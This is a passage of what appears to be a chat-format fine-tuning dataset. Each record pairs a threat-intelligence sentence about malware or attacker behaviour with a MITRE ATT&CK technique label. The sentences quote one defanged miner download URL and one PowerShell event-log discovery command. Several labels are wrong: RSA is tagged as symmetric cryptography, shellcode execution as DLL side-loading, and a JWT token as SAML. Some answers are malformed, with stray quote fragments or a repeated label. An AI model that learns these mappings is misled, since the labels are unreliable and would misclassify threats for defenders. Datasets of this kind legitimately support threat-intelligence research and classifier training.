- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can scan for open ports including TCP ports 135 and 1433."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SNUGRIDE establishes persistence through a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by Ke3chang can run commands on the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can decrypt and parse instructions sent from C2."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used a custom base64 key to encode stolen data before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2: .. To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once elevated, the ransomware will write a copy of a random file from System32 to the %APPDATA% directory. The newly copied file will have a random and hidden filename. This process allows for the ransomware to copy itself into the file by way of an alternate data stream (ADS"
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019."
- },
- {
- "role": "assistant",
- "content": "T1499 - Endpoint Denial of Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label “C:\\” and the computer name"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication"
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get victims to open malicious files sent via email as part of spearphishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can encode files containing information about the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1137.004 - Office Application Startup: Outlook Home Page"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data that is sent is compressed and then base64-encoded before being included in the requests"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin uses regsvr32.exe to run a .sct file for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since version 0.4.1 Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user"
- },
- {
- "role": "assistant",
- "content": "T1606.002 - Forge Web Credentials: SAML token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, it reads the dropped file with the .db3 extension, which contains position-independent code, and uses CreateThread to execute its content"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\\he\\debug directory."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to return a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll and HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies a proxy server if it exists and uses it to make HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can perform brute force password guessing against authentication portals."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “pc” binary checks whether the infected system’s OS is Debian or RHEL/CentOS. Its routine, which involves dropping the cryptocurrency miner and other components, depends on OS. For Debian-based systems, it drops the cryptocurrency miner payload to /tmp/miner2. For CentOS/RHEL systems, it will download a tar (tape archive) file from the URL, hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz, containing the cryptocurrency miner and its multiple components, which is unpacked and then installed"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses \"netstat -ano\" to search for specific IP address ranges."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the “1b” instruction is responsible for executing native code that is specified in parameter field"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1027.002 - Obfuscated Files or Information: Software Packing', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used the command \"powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -\nproperty * | findstr “Address””\" to find the network information of successfully logged-in accounts to discovery addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed: Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. Using shellcode that injects implants into newly created instances of the Service Host process (svchost)."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain, msoffice-cdn[.]com which we identified in August 2017"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware."
- },
- {
- "role": "assistant",
- "content": "T1587.003 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy can record the sounds from microphones on a computer."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack has used RSA encryption for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients"
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to display ARP configuration information on the host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 has been seen using the PowerShell module InvokeGPUpdate to update the group policy."
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification', 'T1484.001 - Domain Policy Modification: Group Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "code may be obfuscated through structured exception handling and return-oriented programming."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim’s device"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used shell scripts to launch various services and to start/stop the QEMU virtualization."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel has trojanized the ssh_login\" and \"user-auth_pubkey\" functions to steal plaintext credentials."
- },
- {
- "role": "assistant",
- "content": "T1556 - Modify Authentication Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed leveraging a module that scrapes email data from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz has used Technet and Pastebin web pages for command and control."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc searches the local system and gathers data."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy has used Tor relays for Command and Control servers."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox has used HTTP POST requests for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use rundll32.exe to load DLL from the command line"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can log keystrokes on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018. The script verifies all parts of the malware have been downloaded. After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded. One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth. The twelve downloaded files"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can download or upload files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun variants can use SSL for encrypting C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload)."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Without the encrypted AES key appended to the encrypted files, even if the private key used for encryption was recovered, the files could not be decrypted. Therefore, the Hermes executable used in the FEIB SWIFT attack appears never to have been used to ransom the machine, but rather to destroy the victim’s data. "
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"tDiscoverer\" variant of establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "esentutl can use Volume Shadow Copy to copy locked files such as ntds.dit."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This list of strings differs from previously analyzed SofacyCarberp samples, such as the variant discussed in our June 2016 blog “New Sofacy Attacks Against US Government Agency“ that chose from a list of strings .xml, .pdf, .htm or .zip. After establishing that the system has Internet access, the Trojan will gather detailed system information and send it to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor also attempted to use OWA account credentials likely acquired during an earlier phase of the intrusion. BRONZE UNION appeared to leverage other compromised infrastructure, presumably to make reentry attempts seem legitimate. This attempt illustrates the importance of thorough planning when conducting an eviction and the need for continuous vigilance for evidence of reentry"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver encrypts collected data with an incremental XOR key prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
